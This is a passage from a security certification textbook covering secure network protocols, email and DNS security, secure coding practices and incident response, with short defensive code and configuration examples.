are often avoided or disabled. For example, HTTPS requires obtaining a valid
SSL/TLS certificate from a certificate authority (CA). After obtaining the appropriate
certificate, it must be correctly installed and configured on a server, which requires
more skill, time, and planning than simply enabling and using HTTP.
Secure protocols leverage encryption and decryption which require the correct
handling of cryptographic keys, including processes regarding how they are
created, stored, distributed, and revoked. Additionally, after properly obtaining
and configuring the certificate, it must be managed effectively to ensure it remains
trustworthy and does not expire.
HTTPS operates over port 443 by default. HTTPS operation is indicated by using
https:// for the URL and by a padlock icon shown in the browser.
It is also possible to install a certificate on the client so that the server can trust the
client. This is not often used on the web but is a feature of VPNs and enterprise
networks that require mutual authentication.
SSL/TLS Versions
While the acronym SSL is still used, the Transport Layer Security versions are the
only ones that are safe to use. A server can provide support for legacy clients, but
obviously this is less secure. For example, a TLS 1.2 server could be configured to
allow clients to downgrade to TLS 1.1 or 1.0 or even SSL 3.0 if they do not support
TLS 1.2.
A downgrade attack is where an on-path attack tries to force the use of a weak cipher
suite and SSL/TLS version.
TLS version 1.3 was approved in 2018. One of the main features of TLS 1.3 is the
removal of the ability to perform downgrade attacks by preventing the use of
insecure features and algorithms from previous versions. There are also changes
to the handshake protocol to reduce the number of messages and speed up
connections.
Cipher Suites
A cipher suite is the set of algorithms supported by both the client and server to perform
the different encryption and hashing operations required by the protocol. Prior to
TLS 1.3, a cipher suite would be written in the following form:
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use Elliptic Curve Diffie-Hellman Ephemeral mode
for session key agreement, RSA signatures, 128-bit AES-GCM (Galois Counter Mode)
for symmetric bulk encryption, and SHA-256 for HMAC functions. Suites the
server prefers are listed earlier in its supported cipher list.
TLS 1.3 uses simplified and shortened suites. A typical TLS 1.3 cipher suite appears
as follows:
TLS_AES_256_GCM_SHA384
Only ephemeral key agreement is supported in 1.3 and the signature type is
supplied in the certificate, so the cipher suite only lists the bulk encryption key
strength and mode of operation (AES_256_GCM), plus the cryptographic hash
algorithm (SHA384) used within the new hash key derivation function (HKDF). HKDF
is the mechanism by which the shared secret established by D-H key agreement is
used to derive symmetric session keys.
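The cipher suites a client is willing to offer can be inspected programmatically. A short sketch using Python's `ssl` module (the exact list depends on the local OpenSSL build):

```python
import ssl

# List the cipher suites this client context will offer. Names follow
# the conventions shown above, e.g. ECDHE-RSA-AES128-GCM-SHA256 for
# TLS 1.2 suites or TLS_AES_256_GCM_SHA384 for TLS 1.3 suites.
context = ssl.create_default_context()
suites = [cipher["name"] for cipher in context.get_ciphers()]
for name in suites:
    print(name)
```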
Viewing the TLS handshake in a Wireshark packet capture. Note that the connection is using
TLS 1.3 and one of the shortened cipher suites (TLS_AES_128_GCM_SHA256).
• Simple Bind—means the client must supply its distinguished name (DN) and
password, but these are passed as plaintext.
If SNMP is not used, it should be disabled. When running SNMP, observe the
following important guidelines:
• SNMP community names are sent in plaintext and so should not be transmitted
over the network if there is any risk that they could be intercepted.
• Use difficult-to-guess community names; never leave the community name blank
or set to the default.
• Use access control lists to restrict management operations to known hosts (that
is, restrict to one or two host IP addresses).
• Use SNMP v3 when possible, and disable older versions of SNMP. SNMP
v3 supports encryption and strong user-based authentication. Instead of
community names, the agents are configured with a list of usernames and
access permissions. When authentication is required, SNMP messages are
signed with a hash of the user’s passphrase. The agent can verify the signature
and authenticate the user using its own record of the passphrase.
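The SNMPv3 guidance above can be illustrated with a configuration fragment, assuming net-snmp's snmpd.conf syntax. The user name and passphrases are placeholders only:

```
# Illustrative net-snmp snmpd.conf lines (user name and passphrases
# are examples, not defaults):
# define an SNMPv3 user with SHA authentication and AES privacy...
createUser opsMonitor SHA "authPassphrase" AES "privPassphrase"
# ...and grant that user read-only access, requiring both
# authentication and privacy (encryption)
rouser opsMonitor priv
```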
You should check that users do not install unauthorized servers on their PCs (a rogue
server). For example, a version of IIS that includes HTTP, FTP, and SMTP servers is
shipped with client versions of Windows, though it is not installed by default.
FTPS is tricky to configure when there are firewalls between the client and server.
Consequently, FTPES is usually the preferred method.
Email Services
Email services use two types of protocols:
• The Simple Mail Transfer Protocol (SMTP) specifies how mail is sent from one
system to another.
• A mailbox protocol stores messages for users and allows them to download
them to client computers or manage them on the server.
The STARTTLS method is generally more widely implemented than SMTPS. Typical
SMTP configurations use the following ports and secure services:
• Port 25—is used for message relay (between SMTP servers or message transfer
agents [MTA]). If security is required and supported by both servers, the
STARTTLS command can be used to set up the secure connection.
• Port 587—is used by mail clients (message submission agents [MSA]) to submit
messages for delivery by an SMTP server. Servers configured to support port 587
should use STARTTLS and require authentication before message submission.
• Port 465—is used by some providers and mail clients for message submission
over implicit TLS (SMTPS), though this usage is now deprecated by standards
documentation.
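The port assignments above can be summarized in a small lookup table. This sketch is illustrative only; the structure and function name are not from any mail library:

```python
# Encodes the SMTP port guidance described above:
# (role, security mechanism, authentication required)
SMTP_PORT_POLICY = {
    25:  ("relay between MTAs", "opportunistic STARTTLS", False),
    587: ("message submission (MSA)", "STARTTLS", True),
    465: ("message submission", "implicit TLS (SMTPS, deprecated)", True),
}

def describe_port(port: int) -> str:
    role, security, auth = SMTP_PORT_POLICY[port]
    need = "authentication required" if auth else "authentication optional"
    return f"Port {port}: {role}; {security}; {need}"
```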
Email Security
Three technologies have emerged as essential for verifying the authenticity
of emails and preventing phishing and spam: Sender Policy Framework (SPF),
DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication,
Reporting & Conformance (DMARC).
Sender Policy Framework (SPF) is an email authentication method that helps
detect and prevent sender address forgery, which is commonly used in phishing
and spam emails. SPF works by verifying the sender’s IP address against a list of
authorized sending IP addresses published in the DNS TXT records of the email
sender’s domain. When an email is received, the receiving mail server checks the
SPF record of the sender’s domain to verify the email originated from one of the
pre-authorized systems.
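The core SPF check (does the sender's IP address match a mechanism in the published record?) can be sketched in Python. This simplified function handles only ip4:/ip6: mechanisms and a final 'all' term; real SPF evaluation also supports include:, mx, a, and other mechanisms:

```python
import ipaddress

def spf_allows(spf_record: str, sender_ip: str) -> bool:
    """Highly simplified SPF check against a DNS TXT record string."""
    ip = ipaddress.ip_address(sender_ip)
    for term in spf_record.split()[1:]:          # skip the v=spf1 version tag
        if term.startswith(("ip4:", "ip6:")):
            network = ipaddress.ip_network(term.split(":", 1)[1], strict=False)
            if ip in network:
                return True                      # sender is pre-authorized
        elif term in ("-all", "~all"):
            return False                         # fail/softfail everyone else
    return False
```

For example, with the record `v=spf1 ip4:192.0.2.0/24 -all`, a message from 192.0.2.10 passes and one from 198.51.100.1 fails.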
Displaying the TXT records for microsoft.com using the dig tool. (Screenshot used with
permission from Microsoft.)
The combined use of SPF, DKIM, and DMARC significantly enhances email security by
making it much more difficult for attackers to impersonate trusted domains, which is
one of the most common tactics used in phishing and spam attacks. These protocols
are key tools in the fight against email-based threats because they provide
mechanisms that help verify the authenticity of emails, maintain the integrity
of the email content, and ensure the safe delivery of electronic communication.
Email Gateway
An email gateway is the control point for all incoming and outgoing email traffic.
It acts as a gatekeeper, scrutinizing all emails to remove potential threats before
they reach inboxes. Email gateways utilize several security measures, including
anti-spam filters, antivirus scanners, and sophisticated threat detection algorithms
to identify phishing attempts, malicious URLs, and harmful attachments. Email
gateways leverage DMARC, SPF, and DKIM to automate the authentication and
validation of email senders, reducing the chances that spoofed or impersonated
emails will be delivered.
Email gateways also play a critical role in policy enforcement by allowing
organizations to create rules related to email content and attachments based on
established policies or regulatory compliance requirements. Attachment blocking,
content filtering, and data loss prevention are common tasks email gateways handle.
DNS Filtering
Domain Name System (DNS) filtering is a technique that blocks or allows access to
specific websites by controlling the resolution of domain names into IP addresses. It
operates on the principle that for a device to access a website, it must first resolve
its domain name into its associated IP address, which is a process managed by DNS.
When a request is made to resolve a website URI, the DNS filter checks the request
against a database of domain names. If the domain is found to be associated with
malicious activities or is on an unapproved list for any reason, the filter blocks the
request, preventing access to the potentially harmful website.
DNS filtering is highly effective for many reasons. A few are listed below:
• It provides a proactive defense mechanism, blocking access to known phishing
sites, malware distribution sites, and other malicious online destinations.
• It can protect all devices connected to a network, including IoT devices, providing
an extra layer of security.
While DNS filtering is highly effective, it must be combined with other security
measures for comprehensive protection.
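The filtering decision itself is straightforward to sketch: before returning an answer, check the requested name and each of its parent domains against a blocklist. The sinkhole address and blocklist contents below are illustrative:

```python
SINKHOLE = "0.0.0.0"
BLOCKLIST = {"malware.example", "phish.example"}

def filtered_answer(domain: str, real_answer: str) -> str:
    """Return a sinkhole address for blocked domains, else the real record."""
    labels = domain.lower().rstrip(".").split(".")
    # Check the name itself and every parent zone against the blocklist,
    # so subdomains of a blocked domain are also blocked.
    for i in range(len(labels) - 1):
        if ".".join(labels[i:]) in BLOCKLIST:
            return SINKHOLE
    return real_answer
```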
DNS Security
DNS is a critical service that should be configured to be fault tolerant. DoS attacks
are hard to perform against the servers that perform Internet name resolution,
but if an attacker can target the DNS server on a private network, it is possible to
seriously disrupt the operation of that network.
To ensure DNS security on a private network, local DNS servers should only accept
recursive queries from local hosts (preferably authenticated local hosts) and not
from the Internet. You also need to implement access control measures on the
server to prevent a malicious user from altering records manually. Similarly, clients
should be restricted to using authorized resolvers to perform name resolution.
Attacks on DNS may also target the server application and/or configuration. Many
DNS services run on BIND (Berkeley Internet Name Domain), distributed by the
Internet Systems Consortium (isc.org). There are known vulnerabilities in many
versions of the BIND server, so it is critical to patch the server to the latest version.
The same general advice applies to other DNS server software, such as Microsoft’s.
Obtain and check security announcements and then test and apply critical and
security-related patches and upgrades.
DNS footprinting means obtaining information about a private network by using
its DNS server to perform a zone transfer (all the records in a domain) to a rogue
DNS or simply by querying the DNS service, using a tool such as nslookup or
dig. To prevent this, apply an access control list that blocks zone transfers
to unauthorized hosts or domains, so that an external server cannot obtain
information about the private network architecture.
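As a sketch of such an access control list, a BIND zone statement can restrict zone transfers to a known secondary server. The zone name, file name, and IP address below are illustrative:

```
zone "corp.example" {
    type master;
    file "corp.example.db";
    // refuse AXFR zone transfers except to the known secondary server
    allow-transfer { 192.0.2.2; };
};
```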
DNS Security Extensions (DNSSEC) help to mitigate against spoofing and poisoning
attacks by providing a validation process for DNS responses. With DNSSEC enabled,
the authoritative server for the zone creates a “package” of resource records (called
an RRset) signed with a private key (the Zone Signing Key). When another server
requests a secure record exchange, the authoritative server returns the package
along with its public key, which can be used to verify the signature.
The public Zone Signing Key is itself signed with a separate Key Signing Key.
Separate keys are used so that if there is some sort of compromise of the Zone
Signing Key, the domain can continue to operate securely by revoking the
compromised key and issuing a new one.
Windows Server DNS services with DNSSEC enabled. (Screenshot used with permission
from Microsoft.)
The Key Signing Key for a particular domain is validated by the parent domain
or host ISP. The top-level domain trusts are validated by the Regional Internet
Registries and the DNS root servers are self-validated, using a type of M-of-N
control group key signing. This establishes a chain of trust from the root servers
down to any particular subdomain.
Review Activity:
Application Protocol Security
Answer the following questions:
1. What type of attack against HTTPS aims to force the server to negotiate
weak ciphers?
4. True or false? DNSSEC depends on a chain of trust from the root servers
down.
Topic 11B
Cloud and Web Application Security Concepts
Cloud and web application security include cloud hardening, which fortifies cloud
infrastructure and reduces its attack surface, and application security, which
ensures software is securely designed, developed, and deployed. Both practices
work together to establish a layered defense strategy, effectively protecting
against many different threats. Secure coding practices include input validation
techniques, incorporating the principle of least privilege, maintaining secure session
management, enforcing encryption, patching support, and many other capabilities.
Additionally, developers must design software that produces comprehensive,
structured, and meaningful logs while incorporating real-time alerting mechanisms.
These complementary practices support a safe and secure cloud and web
application environment.
Input Validation
Input validation is an essential protection technique used in software and
web development that addresses the issue of untrusted input. Untrusted input
is specially crafted data that an attacker provides to an application to
manipulate its behavior. Injection attacks exploit the input mechanisms applications
rely on to execute malicious commands and scripts to access sensitive data, control
the operation of the application, gain access to otherwise protected back-end
systems, and disrupt operations.
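A common input validation approach is allowlisting: accept only input matching a strict pattern, rather than trying to strip out known-bad characters. The username rule below is an illustrative example, not a standard:

```python
import re

# Allowlist: must start with a letter, then 2-31 characters drawn from
# letters, digits, underscore, dot, or hyphen. Anything else is rejected,
# including quotes and other characters commonly used in injection attacks.
USERNAME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9_.-]{2,31}$")

def validate_username(value: str) -> bool:
    return bool(USERNAME_RE.fullmatch(value))
```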
Secure Cookies
Cookies are small pieces of data stored on a computer by a web browser while
accessing a website. They maintain session states, remember user preferences,
and track user behavior and other settings. Cookies can be exploited if not properly
secured, leading to attacks such as session hijacking or cross-site scripting.
To implement secure cookies, developers must follow certain well-documented
principles:
• Use the ‘Secure’ attribute for all cookies to ensure they are only sent over
HTTPS connections and protected from interception via eavesdropping.
• Use the ‘HttpOnly’ attribute to prevent client-side scripts from accessing
cookies and protect against cross-site scripting attacks.
• Use the ‘SameSite’ attribute to limit when cookies are sent to mitigate
cross-site request forgery attacks.
Additionally, cookies should have expiration time limits to restrict their
usable life.
Secure cookie techniques are critical in mitigating several web-based application
attacks, particularly those focused on unauthorized access to or manipulation of
session cookies. Developers can defend against these attacks by employing the
specific cookie attributes described above.
Code Signing
Code signing practices use digital signatures to verify the integrity and authenticity
of software code. Code signing serves a dual purpose: ensuring that software has
not been tampered with since signing and confirming the software publisher’s
identity.
When software is digitally signed, the signer uses a private key to encrypt a hash or
digest of the code—this encrypted hash and the signer’s identity form the digital
signature. Code signing requires using a certificate issued by a trusted certificate
authority (CA). The certificate contains information about the signer’s identity and
is critical for verifying the digital signature. If the certificate is valid and issued by
a trusted CA, the software publisher’s identity can be confidently verified. Code
signing helps analysts and administrators block untrusted software and also helps
protect software publishers by providing a mechanism to validate the authenticity
of their code. Overall, code signing helps build trust in the software distribution
process.
While code signing provides assurance about the origin of code and verifies code
integrity, it does not inherently assure the safety or security of the code itself.
Code signing certifies the source and integrity of the code, but it doesn’t evaluate
the quality or security of the code. The signed code could still contain bugs,
vulnerabilities, or malicious code inserted by the original author. Signing ensures
software is from the expected developer and in the state the developer intended.
While code signing adds trust and authenticity to software distribution, it should not
be relied upon to guarantee secure or bug-free code.
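Code signing encrypts a hash of the code with the publisher's private key. Python's standard library has no asymmetric signing, so this sketch shows only the hashing half of the process: computing and re-checking the digest that a real signature would protect.

```python
import hashlib

def digest(code: bytes) -> str:
    """Compute the SHA-256 digest that a code-signing signature covers."""
    return hashlib.sha256(code).hexdigest()

published = b"print('hello, world')"
expected = digest(published)          # in real signing, this would be
                                      # encrypted with the private key

# A verifier recomputes the digest; any tampering changes it.
tampered = b"print('hello, world'); import os"
assert digest(published) == expected
assert digest(tampered) != expected
```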
Application Protections
Data exposure is a fault that allows privileged information (such as a token,
password, or personal data) to be read without being subject to the appropriate
access controls. Applications must only transmit such data between authenticated
hosts, using cryptography to protect the session. When incorporating encryption in
code, it is important to use industry standard encryption libraries that are proven to
be strong, rather than internally developed ones.
Error Handling
A well-written application must be able to handle errors and exceptions gracefully.
This means that the application performs in a controlled way when something
unpredictable happens. An error or exception could be caused by invalid user input,
a loss of network connectivity, another server or process failing, and so on. Ideally,
the programmer will have written a structured exception handler (SEH) to dictate
what the application should then do. Each procedure can have multiple exception
handlers.
Some handlers will deal with anticipated errors and exceptions; there should also
be a catchall handler that will deal with the unexpected. The main goal must be
for the application not to fail in a way that allows the attacker to execute code or
perform some sort of injection attack. One infamous example of a poorly written
exception handler is the Apple GoTo bug (nakedsecurity.sophos.com/2014/02/24/
anatomy-of-a-goto-fail-apples-ssl-bug-explained-plus-an-unofficial-patch).
Another issue is that an application’s interpreter may default to a standard handler
and display default error messages when something goes wrong. These may reveal
platform information and the inner workings of code to an attacker. It is better for
an application to use custom error handlers so that the developer can choose the
amount of information shown when an error is caused.
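The pattern above can be sketched with one handler for anticipated errors and a catchall that logs details internally while showing the user nothing about the platform. The function and messages are illustrative:

```python
import logging

def handle_request(raw_port: str) -> str:
    try:
        port = int(raw_port)                  # may raise ValueError
        if not 0 < port < 65536:
            raise ValueError("port out of range")
        return f"connecting on port {port}"
    except ValueError:
        # Anticipated error: invalid input, safe to describe generically.
        return "Invalid port number supplied."
    except Exception:
        # Catchall handler: log full details internally, but reveal
        # nothing about the code's inner workings to the user.
        logging.exception("unexpected error in handle_request")
        return "An internal error occurred."
```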
Lesson 11: Enhance Application Security Capabilities | Topic 11B
Technically, an error is a condition that the process cannot recover from, such as the
system running out of memory. An exception is a type of error that can be handled by
a block of code without the process crashing. Note that exceptions are still described as
generating error codes/messages, however.
Memory Management
Many arbitrary code attacks depend on the target application having faulty memory
management procedures. This allows the attacker to execute their own code in the
space marked out by the target application. There are known unsecure memory
management practices that should be avoided, and untrusted input, such as
strings, should be checked to ensure that it cannot overwrite areas of memory.
Monitoring Capabilities
Secure coding practices focus primarily on preventing software vulnerabilities but
also stress enhancements to logging and monitoring capabilities. These features
support security analysts tasked with detecting potential threats and malicious
activity in software. Writing code with enhanced monitoring capabilities improves
the granularity and effectiveness of logging and alerting systems, which are crucial
system monitoring tools.
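One way code can support monitoring is by emitting structured, machine-readable log entries that alerting systems can parse. The field names below are illustrative, not a required schema:

```python
import json

def audit_event(action: str, user: str, outcome: str, **extra) -> str:
    """Serialize an audit event as a structured JSON log line."""
    entry = {"action": action, "user": user, "outcome": outcome, **extra}
    return json.dumps(entry, sort_keys=True)

line = audit_event("login", "jsmith", "failure", source_ip="198.51.100.7")
```

A SIEM or alerting pipeline can then filter and aggregate on fields such as `outcome` without fragile text parsing.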
Software Sandboxing
Sandboxing is a security mechanism used in software development and operation
to isolate running processes from each other or prevent them from accessing the
system they are running on. A sandbox is a protection feature designed to control a
program so it runs with highly restrictive access. This containment strategy reduces
the potential impact of malicious or malfunctioning software, making it effective
for improving system security and stability and mitigating risks associated with
software.
A practical example of sandboxing is implemented in modern web browsers, like
Google Chrome, which separates each tab and extension into distinct processes. If
a website or browser extension in one browser tab attempts to run malicious code,
it is confined within that tab’s sandbox. This action prevents malicious code from
impacting the entire browser or underlying operating system. Similarly, if a tab
crashes, it doesn’t cause the whole browser to fail, improving reliability.
Operating systems also utilize sandboxing to isolate applications. For example, iOS
and Android use sandboxing to limit each application’s actions. An app in a sandbox
can access its own data and resources but cannot access other app data or any
nonessential system resources without explicit permission. This approach limits the
damage caused by poorly written or malicious apps.
Virtual machines (VMs) and containers like Docker offer another example of
sandboxing at a larger scale. Each VM or container can run in isolation, separated
from the host and each other. The others remain unaffected if one VM or container
experiences a security breach or system failure.
Joe Sandbox analysis of a malicious executable file. (Screenshot courtesy of Joe Security, LLC.)
Review Activity:
Cloud and Web Application Security Concepts
Lesson 11
Summary
You should be able to configure secure protocols for local network access and
management, application services, and remote access and management.
• Deploy certificates to email servers to use with secure SMTP, POP3, and IMAP.
• Deploy certificates or host keys to file servers to use with FTPS or SFTP.
• Identify injection attacks (XSS, SQL, XML, LDAP) that exploit lack of input
validation.
• Identify replay and request forgery attacks that exploit lack of secure
session management mechanisms.
• Review and test code using static and dynamic analysis, paying particular
attention to input validation, output encoding, error handling, and data
exposure.
LESSON INTRODUCTION
From a day-to-day perspective, incident response means investigating the alerts
produced by monitoring systems and issues reported by users. This activity is
guided by policies and procedures and assisted by various technical controls.
Incident response is a critical security function, and will be a very large part of your
work as a security professional. You must be able to summarize the phases of
incident handling and utilize appropriate data sources to assist an investigation.
Where incident response emphasizes the swift eradication of malicious activity,
digital forensics requires patient capture, preservation, and analysis of evidence
using verifiable methods. You may be called on to assist with an investigation
into the details of a security incident and to identify threat actors. To assist these
investigations, you must be able to summarize the basic concepts of collecting
and processing forensic evidence that could be used in legal action or for strategic
counterintelligence.
In this lesson, you will do the following:
• Summarize incident response and digital forensics procedures.
Topic 12A
Incident Response
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12A
Incident response likely requires coordinated action and authorization from several
different departments or managers, which adds further levels of complexity.
The IR process is focused on cybersecurity incidents. There are also major incidents
that pose an existential threat to company-wide operations. These major incidents are
handled by disaster recovery processes. A cybersecurity incident might lead to a major
incident being declared, however.
Preparation
The preparation process establishes and updates the policies and procedures
for dealing with security breaches. This includes provisioning the personnel and
resources to implement those policies.
Cybersecurity Infrastructure
Cybersecurity infrastructure comprises the hardware and software tools that
facilitate incident detection, digital forensics, and case management:
• Incident detection tools provide visibility into the environment by fully or
partially automating the collection and analysis of network traffic, system
state monitoring, and log data.
• Digital forensics tools facilitate acquiring and validating data from system
memory and file systems. This can be performed just to assist incident response
or to prosecute a threat actor.
• Case management tools provide a database for logging incident details and
coordinating response activities across a team of responders.
Some organizations may prefer to outsource some of the CIRT functions to third-
party agencies by retaining an incident response provider. External agents are able
to deal more effectively with insider threats.
Communication Plan
Incident response policies should establish clear lines of communication for
reporting incidents and notifying affected parties as the management of an incident
progresses. It is vital to have essential contact information readily available.
It is critical to prevent the unintentional release of information beyond the team
authorized to handle the incident. It is imperative that adversaries not be alerted to
containment and remediation measures to be taken against them. Status and event
details should be circulated on a need-to-know basis and only to trusted parties
identified on a call list.
The team requires an out-of-band communication method that cannot be
intercepted. Using corporate email runs the risk that the threat actor will be able
to intercept communications.
Stakeholder Management
It is not helpful to publicize an incident in the press or through social media outside
of planned communications. Ensure that parties with privileged information do not
release this information to untrusted parties, whether intentionally or inadvertently.
Consider obligations to report an incident. It may be necessary to inform affected
parties during or immediately after the incident so that they can perform their
own remediation. There could also be a requirement to report to regulators or law
enforcement.
Also, consider the marketing and PR impact of an incident. This can be highly
damaging, and the company must demonstrate to customers that security
systems have been improved.
Detection
Detection is the process of correlating events from network and system data
sources and determining whether they are indicators of an incident. There are
multiple channels by which indicators may be recorded:
• Matching events in log files, error messages, IDS alerts, firewall alerts, and other
data sources to a pattern of known threat behavior.
It is wise to provide an option for confidential reporting so that employees are not
afraid to report insider threats such as fraud or misconduct.
When a suspicious event is detected, it is critical that the appropriate person on
the CIRT be notified so that they can take charge of the situation and formulate the
appropriate response. This person is referred to as the first responder. Employees
at all levels of the organization must be trained to recognize and respond
appropriately to actual or suspected security incidents.
Managing alerts generated by host and network intrusion detection systems correlated in
the Security Onion Security Information and Event Management (SIEM) platform. A SIEM can
generate huge numbers of alerts that need to be manually assessed for priority and investigation.
(Screenshot courtesy of Security Onion securityonion.net.)
Analysis
After the detection process reports one or more indicators, in the analysis process,
the first responder investigates the data to determine whether a genuine incident
has been identified and what level of priority it should be assigned. Conversely,
the report might be categorized as a false positive and dismissed. Classification of
a true positive incident event often relies on correlating multiple indicators. For a
complex or high-impact event, the analysis might be escalated to senior CIRT team
members.
When an incident is verified as a true positive, the next objective is to identify
the type of incident and the data or resources affected. This establishes incident
category and impact, and allows the assignment of a priority level.
Impact
Several factors affect the process of determining impact:
• Data integrity—the most important factor in prioritizing incidents will often be
the value of data that is at risk.
• Detection time—research has shown that more than half of data breaches
are not detected for weeks or months after the intrusion occurs, while in a
successful intrusion data is typically breached within minutes. Systems used to
search for intrusions must be thorough and the response to detection must be
fast.
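The two factors above can be combined into a rough triage score. This is a hypothetical sketch; the weights, scale, and function name are illustrative only, not from any standard:

```python
def incident_priority(data_value: int, days_undetected: int) -> int:
    """Illustrative triage score.

    data_value: 1 (low-value data) to 5 (critical data at risk).
    Returns a priority from 1 to 10; longer undetected intrusions
    raise the priority because more data is likely to have been lost.
    """
    age_factor = min(days_undetected // 7, 5)   # cap the detection-time weight
    return min(data_value + age_factor, 10)
```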
Category
Incident categories and definitions ensure that all response team members and
other organizational personnel have a shared understanding of the meaning of
terms, concepts, and descriptions.
Effective incident analysis depends on threat intelligence. This research provides
insight into adversary tactics, techniques, and procedures (TTPs). Insights from
threat research can be used to develop specific tools and playbooks to deal with
event scenarios. A key tool for threat research is the framework used to describe
the stages of an attack. These stages are often referred to as a cyber kill chain,
following the influential white paper Intelligence-Driven Computer Network Defense
commissioned by Lockheed Martin (lockheedmartin.com/content/dam/lockheed-
martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf).
Playbooks
The CIRT should develop profiles or scenarios of typical incidents, such as DDoS
attacks, virus/worm outbreaks, data exfiltration by an external adversary, data
modification by an internal adversary, and so on. This guides investigators in
determining priorities and remediation plans.
A playbook is a data-driven standard operating procedure (SOP) to assist analysts
in detecting and responding to specific cyber threat scenarios. The playbook
starts with a report from an alert dashboard. It then leads the analyst through the
analysis, containment, eradication, recovery, and lessons learned steps to take.
Containment
Following detection and analysis, the incident management database should
have a record of the event indicators, the nature of the incident, its impact, and
the investigator responsible for managing the case. The next phase of incident
management is to determine an appropriate response.
As incidents cover a wide range of different scenarios, technologies, motivations,
and degrees of seriousness, there is no standard approach to containment or
incident isolation. Some of the many complex issues facing the CIRT are the
following:
• What damage or theft has occurred already? How much more could be inflicted,
and in what sort of time frame (loss control)?
• What countermeasures are available? What are their costs and implications?
• What actions could alert the threat actor that the attack has been detected?
What evidence of the attack must be gathered and preserved?
Isolation-Based Containment
Isolation involves removing an affected component from whatever larger
environment it is a part of. This can be everything from removing a server from
the network after it has been the target of a denial of service attack to placing an
application in a sandbox outside the host environments it usually runs on. Isolation
removes any interface between the affected system and the production network or
the Internet.
A simple option is to disconnect the host from the network by pulling the network
plug (creating an air gap) or disabling its switch port. This is the least stealthy option
and will reduce opportunities to analyze the attack or malware.
If a group of hosts is affected, you could use routing infrastructure to isolate one
or more infected virtual LANs (VLANs) in a sinkhole that is not reachable from the
rest of the network. Another possibility is to use firewalls or other security filters to
prevent infected hosts from communicating.
Finally, isolation could also refer to disabling a user account or application service.
Temporarily disabling users’ network accounts may prove helpful in containing
damage if an intruder is detected within the network. Without privileges to access
resources, an intruder will not be able to further damage or steal information from
the organization. Applications that you suspect may be the vector of an attack
can be made far less useful to the attacker by preventing them from executing
on most hosts.
Segmentation-Based Containment
Segmentation-based containment is a means of achieving the isolation of a host
or group of hosts using network technologies and architecture. Segmentation uses
VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from
communicating outside the protected segment. As opposed to completely isolating
the hosts, you might configure the protected segment as a sinkhole or honeynet
and allow the attacker to continue to receive filtered (and possibly modified) output
to deceive them into thinking the attack is progressing successfully. This facilitates
analysis of the threat actor’s TTPs and, potentially, their identity. Attribution of the
attack to a particular group will allow an estimation of adversary capability.
If reinstalling from baseline template configurations or images, make sure that there
is nothing in the baseline that allowed the incident to occur. If there is, update the
template before rolling it out again.
2. Reaudit security controls to ensure they are not vulnerable to a further
attack. This could be the same attack or some new attack that the attacker
could launch through information they have gained about the network.
If the organization is subjected to a targeted attack, be aware that one incident may be
very quickly followed by another.
3. Ensure that affected parties are notified and provided with the means to
remediate their own systems. For example, if customers’ passwords are stolen,
they should be advised to change the credentials for any other accounts where
that password might have been used (not good practice, but most people do it).
Lessons Learned
The lessons learned process reviews severe security incidents to determine their
root cause, whether they were avoidable, and how to avoid them in the future.
Lessons learned activity starts with a meeting where staff review the incident
and responses. The meeting must include staff directly involved along with other
noninvolved incident handlers, who can provide objective, external perspectives. All
staff must contribute freely and openly to the discussion, so these meetings must avoid
pointing blame and instead focus on improving procedures. Leadership should manage
disciplinary concerns related to staff failing to follow established procedures separately.
Following the meeting, one or more analysts should compile a lessons learned
report (LLR) or after-action report (AAR).
The lessons learned process should invoke root cause analysis, or the effort to
determine how the incident was able to occur. Many models have been developed
to structure root cause analysis. One is the “Five Whys” model. This starts with a
statement of the problem and then poses successive “Why” questions to drill down
to root causes. Examples include the following:
• Why was our patient safety database found on a dark website? Because a threat
actor was able to copy it to USB and walk out of the building with it.
• Why was a threat actor able to copy the database to USB at all, or do so without
generating an alert? Because they were able to disable the data loss prevention
system.
• Why were they able to disable the data loss prevention system? Because they
were trusted with privileges to do so.
• Why were they allocated these privileges? No one seems to know . . . all
administrator accounts were issued with them.
• Why didn’t the act of disabling the data loss prevention system generate an
alert? It was logged, but alerts for that category had been disabled for causing
too many false positives.
This identifies two root causes as improper permission assignments and improper
logging/alerting configuration. One issue with the “Five Whys” model is that it can
quickly branch into different directions of inquiry.
• Why was the incident perpetrated? Discuss the motives of the adversary and the
data assets they might have targeted.
• When did the incident occur, when was it detected, and how long did it take to
contain and eradicate?
• Where did the incident occur (host systems and network segments affected)?
• How did the incident occur? What tactics, techniques, and procedures (TTPs)
were employed by the adversary? Were the TTPs known and documented in a
knowledge base such as ATT&CK, or were they unique?
• What security controls would have provided better mitigation or improved the
response?
Testing
The procedures and tools used for incident response are difficult to master and
execute effectively. Analysts should not be practicing them for the first time in the
high-pressure environment of an actual incident. Running test exercises helps staff
develop competencies and can help to identify deficiencies in the procedures and
tools. Testing on specific incident response scenarios can take three forms:
• Tabletop exercise—this is the least costly type of testing. The facilitator presents
a scenario, and the responders explain what action they would take to identify,
contain, and eradicate the threat. The training does not use computer systems.
The scenario data is presented as flash cards.
Training
The actions of staff immediately following the detection of an incident can have a
critical impact on successful outcomes. Effective training on incident detection and
reporting procedures equips staff with the knowledge they need to react swiftly and
effectively to security events. Incident response is also likely to require coordinated
efforts from several different departments or groups, so cross-departmental
training is essential. The lessons learned phase of incident response often reveals a
need for additional security awareness and compliance training for employees. This
type of training helps employees develop the knowledge to identify attacks in the
future.
Training should focus on more than just technical skills and knowledge. Security
incidents can be very stressful and quickly cause working relationships to crack.
Training can improve team building and communication skills, giving employees
greater resilience when adverse events occur.
Threat Hunting
Threat hunting utilizes insights gained from threat intelligence to proactively
discover whether there is evidence of TTPs already present within the network
or system. This contrasts with a reactive process that is only triggered when alert
conditions are reported through an incident management system. Threat hunting
can provide useful information to the incident response preparation process, such
as demonstrating the value of investments in security tools and showing the need
for improvements to detection and analysis processes.
A threat hunting project is likely to be led by senior security analysts, but some
general points to observe include the following:
• Advisories and bulletins that warn of new threat types—threat hunting is a labor-
intensive activity and so needs to be performed with clear goals and resources.
Threat hunting usually proceeds according to some hypothesis of possible
threat. Security bulletins and advisories from vendors and security researchers
about new TTPs and/or vulnerabilities may be the trigger for establishing a
threat hunt. For example, if threat intelligence reveals that Windows desktops in
many companies are being infected with a new type of malware that is not being
blocked by any current malware definitions, you might initiate a threat-hunting
